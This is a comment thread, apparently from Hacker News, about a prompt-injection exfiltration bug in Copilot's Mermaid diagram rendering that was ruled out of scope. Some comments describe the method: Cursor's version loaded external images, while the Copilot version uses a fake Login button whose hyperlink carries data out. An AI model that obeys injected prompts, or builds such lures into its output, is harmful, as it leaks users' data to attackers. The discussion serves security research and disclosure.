What a shame. There’s probably LOTS of vulns in copilot. This just discourages researchers and responsible disclosure, likely leaving copilot very insecure in the long run.
Probably exactly why they "determined" it to be out of scope :)
If I code a var blah = 5*5; I know the answer is always 35. But if I ask an LLM, it seems like the answer could be anything from correct to any incorrect number one could dream up.
We saw this at work with the seahorse emoji question. A variety of [slight] different answers.
I greatly enjoy the irony here.
Which points to just how much unlicensed copyrighted material is in LLM training sets (whether fair use or not).
i love the use of all capitals for emphasis for important instructions in the malicious prompt. it's almost like an enthusiastic leader of a criminal gang explaining the plot in a dingey diner the night before as the rain pours outside.
simonw•2h ago
This isn't the first Mermaid prompt injection exfiltration we've seen - here's one from August that was reported by Johann Rehberger against Cursor (and fixed by them): https://embracethered.com/blog/posts/2025/cursor-data-exfilt...
That's mentioned in the linked post. Looks like that attack was different - Cursor's Mermaid implementation could render external images, but Copilot's doesn't let you do that so you need to trick users with a fake Login button that activates a hyperlink instead.
luke-stanley•2h ago
Thanks for the archive link and the very useful term BTW! I also got 503 when trying to visit.
simonw•2h ago
The first AI lab to solve unrelated instruction following is going to have SUCH a huge impact.
hshdhdhehd•1h ago